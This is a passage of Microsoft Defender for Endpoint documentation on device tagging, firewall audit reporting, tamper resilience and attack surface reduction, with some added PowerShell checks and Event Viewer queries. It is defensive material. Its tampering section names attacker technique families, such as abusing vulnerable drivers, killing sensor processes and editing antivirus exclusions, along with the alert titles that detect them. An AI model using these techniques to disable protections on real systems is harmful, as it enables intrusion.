When you create a new tag, a list of existing tags is displayed. The list only shows
tags created through the portal. Existing tags created from client devices will not be
displayed.

You can also delete tags from this view.

Add device tags by setting a registry key value

Note

Applicable only on the following devices:

Windows 11
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2
Windows Server 2008 R2 SP1
Windows 8.1
Windows 7 SP1

Note

The maximum number of characters that can be set in a tag is 200.

Devices with similar tags can be handy when you need to apply contextual action on a
specific list of devices.
Use the following registry key entry to add a tag on a device:

Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging\
Registry key value (REG_SZ): Group
Registry key data: Name of the tag you want to set

Note

The device tag is part of the device information report that's generated once a day.
As an alternative, you may choose to restart the endpoint that would transfer a new
device information report.

If you need to remove a tag that was added using the above Registry key, clear the
contents of the Registry key data instead of removing the 'Group' key.
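The registry method above, as an added example that is not code from the Microsoft article: the functions set the REG_SZ value named Group under the documented DeviceTagging key, enforce the 200-character limit, and clear the tag by emptying the data rather than deleting the value. Function names are this example's own; run it in an elevated PowerShell session on one of the supported Windows versions.

```powershell
# Added example, not code from the Microsoft article: set, read and clear the
# Defender for Endpoint device tag through the registry key the article documents.
# Path, value name (REG_SZ "Group") and the 200-character limit come from the page;
# the function names are this example's own.
$TagKeyPath   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging'
$TagValueName = 'Group'
$MaxTagLength = 200

function Set-MdeDeviceTag {
    param([Parameter(Mandatory)][string]$Tag)

    if ($Tag.Length -gt $MaxTagLength) {
        throw "Tag is $($Tag.Length) characters long; the limit is $MaxTagLength."
    }
    # The page notes that the portal's Tags filter may not work on names that
    # contain parentheses or commas, so warn before writing such a tag.
    if ($Tag -match '[(),]') {
        Write-Warning "Tag '$Tag' contains parentheses or commas; portal filtering may not work."
    }
    if (-not (Test-Path -Path $TagKeyPath)) {
        New-Item -Path $TagKeyPath -Force | Out-Null
    }
    # REG_SZ value named Group; the data is the tag name.
    New-ItemProperty -Path $TagKeyPath -Name $TagValueName -Value $Tag `
        -PropertyType String -Force | Out-Null
}

function Get-MdeDeviceTag {
    # Returns $null when the key or value is absent, '' when the tag has been cleared.
    if (-not (Test-Path -Path $TagKeyPath)) { return $null }
    $item = Get-ItemProperty -Path $TagKeyPath -Name $TagValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [string]$item.$TagValueName
}

function Clear-MdeDeviceTag {
    # As the article says: clear the data, do not delete the Group value itself.
    if (Test-Path -Path $TagKeyPath) {
        Set-ItemProperty -Path $TagKeyPath -Name $TagValueName -Value ''
    }
}

# Usage (the tag name is a constructed sample)
Set-MdeDeviceTag -Tag 'Finance-Workstations'
"Current tag: '$(Get-MdeDeviceTag)'"
# Clear-MdeDeviceTag   # uncomment to stop tagging this device
```

The tag reaches the portal with the next daily device information report, or after a restart of the endpoint, as the note above states.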

Add device tags by creating a custom profile in Microsoft Intune

You can use Microsoft Intune to define and apply device tags. You can perform this task
by creating a device configuration profile using custom settings in Intune. For more
information, see Create a profile with custom settings in Intune.

- In the Create the profile procedure, for step 3, choose either macOS or Windows
  10 and later, depending on the devices you want to tag.
- For Windows 10 or later, in the OMA-URI settings section, for Data type, choose
  String. For OMA-URI, type (or paste)
  ./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group .

- For macOS, follow the guidance in Use custom settings for macOS devices in
  Microsoft Intune.


Host firewall reporting in Microsoft
Defender for Endpoint
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

If you're a Global or security administrator, you can now view host firewall reporting in the
Microsoft Defender portal. This feature enables you to view Windows firewall
reporting from a centralized location.

What do you need to know before you begin?

You must be running Windows 10 or later, or Windows Server 2012 R2 or later.

Note

For Windows Server 2012 R2 and Windows Server 2016 to appear in Firewall reports,
these devices must be onboarded using the modern unified solution package.
For more information, see New functionality in the modern unified solution
for Windows Server 2012 R2 and 2016.

To onboard devices to the Microsoft Defender for Endpoint service, see here.
For the Microsoft Defender portal to start receiving the data, you must enable Audit
Events for Windows Defender Firewall with Advanced Security:
- Audit Filtering Platform Packet Drop
- Audit Filtering Platform Connection
Enable these events by using Group Policy Object Editor, Local Security Policy, or
the auditpol.exe commands. For more information, see here.
The two PowerShell commands are:

auditpol /set /subcategory:"Filtering Platform Packet Drop" /failure:enable
auditpol /set /subcategory:"Filtering Platform Connection" /failure:enable

PowerShell

param (
    [switch]$remediate
)
try {
    # Both Filtering Platform subcategories must audit failures for firewall
    # reporting to receive data.
    $categories = "Filtering Platform Packet Drop,Filtering Platform Connection"
    $current = auditpol /get /subcategory:"$($categories)" /r | ConvertFrom-Csv
    # "Failure" and "Success and Failure" both satisfy the requirement; anything
    # else (for example "No Auditing") needs remediation.
    if ($current."Inclusion Setting" -notmatch "Failure") {
        if ($remediate.IsPresent) {
            Write-Host "Remediating. No Auditing Enabled. $($current | ForEach-Object {$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})"
            $output = auditpol /set /subcategory:"$($categories)" /failure:enable
            if ($output -eq "The command was successfully executed.") {
                Write-Host "$($output)"
                exit 0
            }
            else {
                Write-Host "$($output)"
                exit 1
            }
        }
        else {
            Write-Host "Remediation Needed. $($current | ForEach-Object {$_.Subcategory + ":" + $_.'Inclusion Setting' + ";"})."
            exit 1
        }
    }
}
catch {
    throw $_
}

The process

Note

Make sure to follow the instructions from the section above and properly configure
your devices for the early preview participation.

After enabling the events, Microsoft Defender XDR will start to monitor the data,
which includes:
- Remote IP
- Remote Port
- Local Port
- Local IP
- Computer Name
- Process across inbound and outbound connections

Admins can now see Windows host firewall activity here.
Additional reporting can be facilitated by downloading the Custom Reporting
script to monitor the Windows Defender Firewall activities using Power BI.
It can take up to 12 hours before the data is reflected.

Supported scenarios
- Firewall reporting
- From "Computers with a blocked connection" to device
- Drill into advanced hunting (preview refresh)

Firewall reporting
Here are some examples of the firewall report pages. Here you'll find a summary of
inbound, outbound, and application activity. You can access this page directly by going
to https://security.microsoft.com/firewall .

These reports can also be accessed by going to Reports > Security Report > Devices
(section) located at the bottom of the Firewall Blocked Inbound Connections card.

From "Computers with a blocked connection" to device

Cards support interactive objects. You can drill into the activity of a device by clicking on
the device name, which will launch the Microsoft Defender portal in a new tab, and take
you directly to the Device Timeline tab.

You can now select the Timeline tab, which will give you a list of events associated with
that device.

After clicking on the Filters button on the upper right-hand corner of the viewing pane,
select the type of event you want. In this case, select Firewall events and the pane will
be filtered to Firewall events.


Drill into advanced hunting (preview refresh)
Firewall reports support drilling from the card directly into Advanced Hunting by
clicking the Open Advanced hunting button. The query will be pre-populated.

The query can now be executed, and all related Firewall events from the last 30 days can
be explored.

For more reporting, or custom changes, the query can be exported into Power BI for
further analysis. Custom reporting can be facilitated by downloading the Custom
Reporting script to monitor the Windows Defender Firewall activities using Power BI.


Protect your organization from the
effects of tampering
Article • 07/04/2023

Tampering is the general term used to describe attackers' attempts to impair the
effectiveness of Microsoft Defender for Endpoint. The ultimate goal of attackers isn't to
affect just one device, but rather to achieve their objective, such as launching a
ransomware attack. As such, the anti-tampering capabilities of Microsoft Defender for
Endpoint extend beyond preventing tampering of a single device to detecting attacks
and minimizing their impact.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender for Business

Organization-wide tamper resiliency is built on Zero Trust

The foundation for defending against tampering is following a Zero Trust model.

- Follow the best practice of least privilege. See Access control overview for
  Windows.
- Configure Conditional Access policies to keep untrusted users and devices isolated.

In order to provide an effective defense against tampering, devices must be healthy.

- Onboard devices to Defender for Endpoint.
- Make sure security intelligence and antivirus updates are installed.
- Manage devices centrally, such as by using Microsoft Intune, Microsoft Defender for
  Endpoint Security Configuration Management, or Configuration Manager.

Note

On Windows devices, Microsoft Defender Antivirus can be managed by using
Group Policy, Windows Management Instrumentation (WMI), and PowerShell
cmdlets. However, those methods are more susceptible to tampering than by using
Microsoft Intune, Configuration Manager, or Microsoft Defender for Endpoint
Security Configuration Management. If you're using Group Policy, we recommend
disabling local overrides for Microsoft Defender Antivirus settings and disabling
local list merging.

You can view health status for Microsoft Defender Antivirus health and sensors in the
device health reports in Microsoft Defender for Endpoint.
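The device-health prerequisites listed above, checked locally on one Windows device, as an added example that is not Microsoft's code. It assumes (not stated on this page) that onboarding state can be read from the OnboardingState value under HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status, that the sensor runs as the service named Sense, and that 7 days is an acceptable signature age; the function name is the example's own.

```powershell
# Added example, not Microsoft's code: a read-only check of the device-health
# points the article lists (onboarded, sensor running, security intelligence
# current, tamper protection on) on a single Windows device.
# Assumptions not stated on this page: the OnboardingState registry value
# (1 = onboarded), the "Sense" service name, and the 7-day signature threshold.
function Get-MdeTamperReadiness {
    param([int]$MaxSignatureAgeDays = 7)   # locally chosen threshold

    $mp = Get-MpComputerStatus
    $statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
    $onboarding = (Get-ItemProperty -Path $statusKey -Name OnboardingState `
        -ErrorAction SilentlyContinue).OnboardingState
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue

    # Each entry is one prerequisite from the article, evaluated to $true/$false.
    $checks = [ordered]@{
        'Onboarded to Defender for Endpoint' = ($onboarding -eq 1)
        'Sense service running'              = ($null -ne $sense -and $sense.Status -eq 'Running')
        'Antivirus in active mode'           = ($mp.AMRunningMode -eq 'Normal')
        'Real-time protection enabled'       = [bool]$mp.RealTimeProtectionEnabled
        'Tamper protection enabled'          = [bool]$mp.IsTamperProtected
        'Security intelligence up to date'   = ($mp.AntivirusSignatureAge -le $MaxSignatureAgeDays)
    }

    $failed = @($checks.Keys | Where-Object { -not $checks[$_] })
    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        Ready        = ($failed.Count -eq 0)
        Failed       = $failed
        Checks       = $checks
    }
}

# Usage: a device with Ready = False has a prerequisite to fix before the
# anti-tampering controls described in this article can be relied on.
$result = Get-MdeTamperReadiness
$result | Format-List
if (-not $result.Ready) { exit 1 }
```

The same six points are what the device health reports in the portal summarize fleet-wide; this script is for spot-checking one device or wiring into a local compliance job.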

Preventing tampering on a single device

Attackers use various tampering techniques to disable Microsoft Defender for Endpoint
on a single device. These techniques are prevented differently on different operating
systems.

Control: Tamper protection
OS: Windows
Technique families:
- Terminating/suspending processes
- Stopping/pausing/suspending services
- Modifying registry settings including exclusions
- Manipulating/hijacking DLLs
- Manipulation/modification of the file system
- Agent integrity

Control: Tamper protection
OS: Mac
Technique families:
- Terminating/suspending processes
- Manipulation/modification of the file system
- Agent integrity

Control: Attack surface reduction rules
OS: Windows
Technique families: Kernel drivers (see Block abuse of exploited vulnerable signed drivers)

Control: Windows Defender Application Control (WDAC)
OS: Windows
Technique families: Kernel drivers (see Microsoft vulnerable driver blocklist)

Understanding the different ways to prevent driver-based tampering on Windows

One of the most common tampering techniques is to use a vulnerable driver to gain
access to the kernel. This driver is often wrapped in an easy to deploy tool, but the
underlying technique is the same.

In order to prevent a driver based tampering on a single device, the device needs to be
configured to block the loading of that driver before the attack.
Microsoft provides several ways to keep devices well protected and up to date against
driver based tampering.

Broadest protection - Microsoft vulnerable driver blocklist

The blocklist is updated with each new major release of Windows, typically 1-2 times per
year. Microsoft will occasionally publish future updates through regular Windows
servicing. With Windows 11 2022 update, the vulnerable driver blocklist is enabled by
default for all devices, but requires either memory integrity (also known as hypervisor-
protected code integrity or HVCI), Smart App Control, or S mode to be active.

See Microsoft vulnerable driver blocklist.

For devices that don't meet those requirements, this list of drivers can be blocked by
using Windows Defender Application Control policy.

See Vulnerable Driver blocklist XML.

Faster updates - Block exploited vulnerable and signed drivers ASR rule

The list of drivers blocked by the exploited and vulnerable drivers ASR rule is updated more
frequently than the recommended driver blocklist. ASR rules can run in audit mode first
to ensure that there's no impact before applying the rule in block mode.

See Block abuse of exploited vulnerable signed drivers rule.

Block other drivers - Windows Defender Application Control (WDAC)
Attackers might attempt to use drivers that aren't blocked by either the recommended
driver blocklist or an ASR rule. In this case, customers can protect themselves by using
WDAC to create a policy to block

WDAC also provides an audit mode to help understand the impact of applying the
policy in block mode to avoid accidentally impacting legitimate use.
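The three layers above (the built-in blocklist, the ASR driver rule, and WDAC) each have their own "is it actually enforcing?" state. The following added example, which is not part of the Microsoft documentation, reports all three for the local device; it assumes Windows 10/11 with the Defender cmdlets and the Win32_DeviceGuard WMI class, and the ASR rule GUID it uses is taken from Microsoft's ASR rule reference rather than from this page.

```powershell
# Added example (not from the Microsoft documentation): report which of the three
# driver-blocking layers described above are active on this device.
# Assumes Windows 10/11 with the Defender cmdlets and the Win32_DeviceGuard WMI class.
# The rule GUID for "Block abuse of exploited vulnerable signed drivers" is taken from
# Microsoft's ASR rule reference, not from this page; verify it against that reference.
$DriverRuleId = '56a863a9-875e-4185-98a7-b882c64b5ce5'

# Value meanings for Win32_DeviceGuard.*CodeIntegrityPolicyEnforcementStatus
$WdacState = @{ 0 = 'Off'; 1 = 'Audit'; 2 = 'Enforced' }
# Value meanings for MpPreference.AttackSurfaceReductionRules_Actions
$AsrAction = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Get-DriverTamperingProtectionStatus {
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName 'Win32_DeviceGuard'
    # SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI (memory integrity).
    # HVCI is one of the conditions under which the built-in vulnerable driver blocklist applies.
    $hvciRunning = @($dg.SecurityServicesRunning) -contains 2

    $kernelKey  = [int]$dg.CodeIntegrityPolicyEnforcementStatus
    $userKey    = [int]$dg.UsermodeCodeIntegrityPolicyEnforcementStatus
    $wdacKernel = if ($WdacState.ContainsKey($kernelKey)) { $WdacState[$kernelKey] } else { "Unknown($kernelKey)" }
    $wdacUser   = if ($WdacState.ContainsKey($userKey))   { $WdacState[$userKey] }   else { "Unknown($userKey)" }

    # Look up the ASR driver rule: Ids and Actions are parallel arrays in MpPreference.
    $mp  = Get-MpPreference
    $ids = @($mp.AttackSurfaceReductionRules_Ids | Where-Object { $_ } | ForEach-Object { $_.ToLowerInvariant() })
    $idx = [Array]::IndexOf($ids, $DriverRuleId)
    $ruleAction = 'Not configured'
    if ($idx -ge 0) {
        $a = [int]$mp.AttackSurfaceReductionRules_Actions[$idx]
        $ruleAction = if ($AsrAction.ContainsKey($a)) { $AsrAction[$a] } else { "Unknown($a)" }
    }

    [pscustomobject]@{
        MemoryIntegrityHvci     = $hvciRunning
        VulnerableDriverAsrRule = $ruleAction
        WdacKernelModePolicy    = $wdacKernel
        WdacUserModePolicy      = $wdacUser
    }
}

$status = Get-DriverTamperingProtectionStatus
$status | Format-List

# Flag the gap the text warns about: without HVCI the built-in blocklist only applies when
# Smart App Control or S mode is active (not checked here), so an enforcing ASR rule or an
# enforced WDAC policy is the remaining driver-blocking layer.
if (-not $status.MemoryIntegrityHvci -and
    $status.VulnerableDriverAsrRule -ne 'Block' -and
    $status.WdacKernelModePolicy -ne 'Enforced') {
    Write-Warning 'No driver-blocking layer is enforcing on this device.'
}
```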

Preventing tampering via Microsoft Defender Antivirus exclusions on Windows
A common technique used by attackers is to make unauthorized changes to anti-virus
exclusions. Tamper protection prevents such attacks from occurring when all of the
following conditions are met:

- The device is managed by Intune; and
- The device has Disable Local Admin Merge enabled.

For more information, see Tamper protection for antivirus exclusions.

Attackers can be prevented from discovering existing antivirus exclusions by enabling HideExclusionsFromLocalAdmin.

Detecting potential tampering activity in the Microsoft Defender portal
When tampering is detected, an alert is raised. Some of the alert titles for tampering are:

Attempt to bypass Microsoft Defender for Endpoint client protection
Attempt to stop Microsoft Defender for Endpoint sensor
Attempt to tamper with Microsoft Defender on multiple devices
Attempt to turn off Microsoft Defender Antivirus protection
Defender detection bypass
Driver-based tampering attempt blocked
Image file execution options set for tampering purposes
Microsoft Defender Antivirus protection turned off
Microsoft Defender Antivirus tampering
Modification attempt in Microsoft Defender Antivirus exclusion list
Pending file operations mechanism abused for tampering purposes
Possible Antimalware Scan Interface (AMSI) tampering
Possible remote tampering
Possible sensor tampering in memory
Potential attempt to tamper with MDE via drivers
Security software tampering
Suspicious Microsoft Defender Antivirus exclusion
Tamper protection bypass
Tampering activity typical to ransomware attacks
Tampering with Microsoft Defender for Endpoint sensor communication
Tampering with Microsoft Defender for Endpoint sensor settings
Tampering with the Microsoft Defender for Endpoint sensor

If the Block abuse of exploited vulnerable signed drivers attack surface reduction rule is triggered, the event is viewable in the ASR Report and in Advanced Hunting. If Windows Defender Application Control (WDAC) is enabled, the block and audit activity can be seen in Advanced Hunting.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Understand and use attack surface
reduction capabilities
Article • 09/29/2023

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Tip

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Attack surfaces are all the places where your organization is vulnerable to cyberthreats
and attacks. Defender for Endpoint includes several capabilities to help reduce your
attack surfaces. Watch the following video to learn more about attack surface reduction.
https://www.microsoft.com/en-us/videoplayer/embed/RE4woug?postJsllMsg=true

Configure attack surface reduction capabilities

To configure attack surface reduction in your environment, follow these steps:

1. Enable hardware-based isolation for Microsoft Edge.
2. Enable attack surface reduction rules.
3. Enable application control.
   a. Review base policies in Windows. See Example Base Policies.
   b. See the Windows Defender Application Control design guide.
   c. Refer to Deploying Windows Defender Application Control (WDAC) policies.
4. Enable controlled folder access.
5. Enable removable storage protection.
6. Turn on network protection.
7. Enable Web protection.
8. Enable exploit protection.
9. Set up your network firewall.
   a. Get an overview of Windows Firewall with advanced security.
   b. Use the Windows Firewall design guide to decide how you want to design your firewall policies.
   c. Use the Windows Firewall deployment guide to set up your organization's firewall with advanced security.

Tip

In most cases, when you configure attack surface reduction capabilities, you can
choose from among several methods:

Microsoft Intune
Microsoft Configuration Manager
Group Policy
PowerShell cmdlets

Test attack surface reduction in Microsoft Defender for Endpoint
As part of your organization's security team, you can configure attack surface reduction
capabilities to run in audit mode to see how they work. You can enable the following
attack surface reduction security features in audit mode:

Attack surface reduction rules
Exploit protection
Network protection
Controlled folder access
Device control

Audit mode lets you see a record of what would have happened if you had enabled the
feature.

You can enable audit mode when testing how the features work. Enabling audit mode
only for testing helps to prevent audit mode from affecting your line-of-business apps.
You can also get an idea of how many suspicious file modification attempts occur over a
certain period of time.
The features don't block or prevent apps, scripts, or files from being modified. However,
the Windows Event Log records events as if the features were fully enabled. With audit
mode, you can review the event log to see what effect the feature would have had if it
was enabled.

To find the audited entries, go to Applications and Services > Microsoft > Windows >
Windows Defender > Operational.

Use Defender for Endpoint to get greater details for each event. These details are
especially helpful for investigating attack surface reduction rules. Using the Defender for
Endpoint console lets you investigate issues as part of the alert timeline and
investigation scenarios.

You can enable audit mode using Group Policy, PowerShell, and configuration service
providers (CSPs).

| Audit options | How to enable audit mode | How to view events |
| --- | --- | --- |
| Audit applies to all events | Enable controlled folder access | Controlled folder access events |
| Audit applies to individual rules | Step 1: Test attack surface reduction rules using Audit mode | Step 2: Understand the Attack surface reduction rules reporting page |
| Audit applies to all events | Enable network protection | Network protection events |
| Audit applies to individual mitigations | Enable exploit protection | Exploit protection events |

For example, you can test attack surface reduction rules in audit mode prior to enabling them in block mode. Attack surface reduction rules are predefined to harden common, known attack surfaces. There are several methods you can use to implement attack surface reduction rules. The preferred method is documented in the following attack surface reduction rules deployment articles:

Attack surface reduction rules deployment overview
Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules

View attack surface reduction events
Review attack surface reduction events in Event Viewer to monitor which rules or settings are working. You can also determine whether any settings are too "noisy" or are impacting your day-to-day workflow.

Reviewing events is handy when you're evaluating the features. You can enable audit
mode for features or settings, and then review what would have happened if they were
fully enabled.

This section lists all the events, their associated feature or setting, and describes how to
create custom views to filter to specific events.

Get detailed reporting into events, blocks, and warnings as part of Windows Security if
you have an E5 subscription and use Microsoft Defender for Endpoint.

Use custom views to review attack surface reduction capabilities
Create custom views in the Windows Event Viewer to only see events for specific
capabilities and settings. The easiest way is to import a custom view as an XML file. You
can copy the XML directly from this page.

You can also manually navigate to the event area that corresponds to the feature.

Import an existing XML custom view

1. Create an empty .txt file and copy the XML for the custom view you want to use into the .txt file. Do this for each of the custom views you want to use. Rename the files as follows (ensure you change the type from .txt to .xml):

   Controlled folder access events custom view: cfa-events.xml
   Exploit protection events custom view: ep-events.xml
   Attack surface reduction events custom view: asr-events.xml
   Network protection events custom view: np-events.xml

2. Type event viewer in the Start menu and open Event Viewer.

3. Select Action > Import Custom View...


4. Navigate to where you extracted the XML file for the custom view you want and
select it.

5. Select Open.

6. It creates a custom view that filters to only show the events related to that feature.

Copy the XML directly

1. Type event viewer in the Start menu and open the Windows Event Viewer.

2. On the left panel, under Actions, select Create Custom View...


3. Go to the XML tab and select Edit query manually. You see a warning that you
can't edit the query using the Filter tab if you use the XML option. Select Yes.

4. Paste the XML code for the feature you want to filter events from into the XML
section.

5. Select OK. Specify a name for your filter. This action creates a custom view that
filters to only show the events related to that feature.

XML for attack surface reduction rule events

XML

<QueryList>
<Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
<Select Path="Microsoft-Windows-Windows Defender/Operational">*
[System[(EventID=1121 or EventID=1122 or EventID=5007)]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/WHC">*
[System[(EventID=1121 or EventID=1122 or EventID=5007)]]</Select>
</Query>
</QueryList>

XML for controlled folder access events

XML

<QueryList>
<Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
<Select Path="Microsoft-Windows-Windows Defender/Operational">*
[System[(EventID=1123 or EventID=1124 or EventID=5007)]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/WHC">*
[System[(EventID=1123 or EventID=1124 or EventID=5007)]]</Select>
</Query>
</QueryList>

XML for exploit protection events

XML

<QueryList>
<Query Id="0" Path="Microsoft-Windows-Security-Mitigations/KernelMode">
<Select Path="Microsoft-Windows-Security-Mitigations/KernelMode">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Concurrency">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Contention">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Messages">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Operational">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Power">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Render">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/Tracing">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Win32k/UIPI">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-
Security-Mitigations' or @Name='Microsoft-Windows-WER-Diag' or
@Name='Microsoft-Windows-Win32k' or @Name='Win32k'] and ( (EventID &gt;= 1
and EventID &lt;= 24) or EventID=5 or EventID=260)]]</Select>
<Select Path="Microsoft-Windows-Security-Mitigations/UserMode">*
[System[Provider[@Name='Microsoft-Windows-Security-Mitigations' or
@Name='Microsoft-Windows-WER-Diag' or @Name='Microsoft-Windows-Win32k' or
@Name='Win32k'] and ( (EventID &gt;= 1 and EventID &lt;= 24) or EventID=5
or EventID=260)]]</Select>
</Query>
</QueryList>

XML for network protection events


XML

<QueryList>
<Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
<Select Path="Microsoft-Windows-Windows Defender/Operational">*
[System[(EventID=1125 or EventID=1126 or EventID=5007)]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/WHC">*
[System[(EventID=1125 or EventID=1126 or EventID=5007)]]</Select>
</Query>
</QueryList>

List of attack surface reduction events

All attack surface reduction events are located under Applications and Services Logs >
Microsoft > Windows and then the folder or provider as listed in the following table.

You can access these events in Windows Event viewer:

1. Open the Start menu and type event viewer, and then select the Event Viewer
result.

2. Expand Applications and Services Logs > Microsoft > Windows and then go to
the folder listed under Provider/source in the table below.

3. Double-click on the sub item to see events. Scroll through the events to find the one you're looking for.
| Feature | Provider/source | Event ID | Description |
| --- | --- | --- | --- |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 1 | ACG audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 2 | ACG enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 3 | Don't allow child processes audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 4 | Don't allow child processes block |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 5 | Block low integrity images audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 6 | Block low integrity images block |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 7 | Block remote images audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 8 | Block remote images block |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 9 | Disable win32k system calls audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 10 | Disable win32k system calls block |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 11 | Code integrity guard audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 12 | Code integrity guard block |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 13 | EAF audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 14 | EAF enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 15 | EAF+ audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 16 | EAF+ enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 17 | IAF audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 18 | IAF enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 19 | ROP StackPivot audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 20 | ROP StackPivot enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 21 | ROP CallerCheck audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 22 | ROP CallerCheck enforce |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 23 | ROP SimExec audit |
| Exploit protection | Security-Mitigations (Kernel Mode/User Mode) | 24 | ROP SimExec enforce |
| Exploit protection | WER-Diagnostics | 5 | CFG Block |
| Exploit protection | Win32K (Operational) | 260 | Untrusted Font |
| Network protection | Windows Defender (Operational) | 5007 | Event when settings are changed |
| Network protection | Windows Defender (Operational) | 1125 | Event when Network protection fires in Audit-mode |
| Network protection | Windows Defender (Operational) | 1126 | Event when Network protection fires in Block-mode |
| Controlled folder access | Windows Defender (Operational) | 5007 | Event when settings are changed |
| Controlled folder access | Windows Defender (Operational) | 1124 | Audited Controlled folder access event |
| Controlled folder access | Windows Defender (Operational) | 1123 | Blocked Controlled folder access event |
| Controlled folder access | Windows Defender (Operational) | 1127 | Blocked Controlled folder access sector write block event |
| Controlled folder access | Windows Defender (Operational) | 1128 | Audited Controlled folder access sector write block event |
| Attack surface reduction | Windows Defender (Operational) | 5007 | Event when settings are changed |
| Attack surface reduction | Windows Defender (Operational) | 1122 | Event when rule fires in Audit-mode |
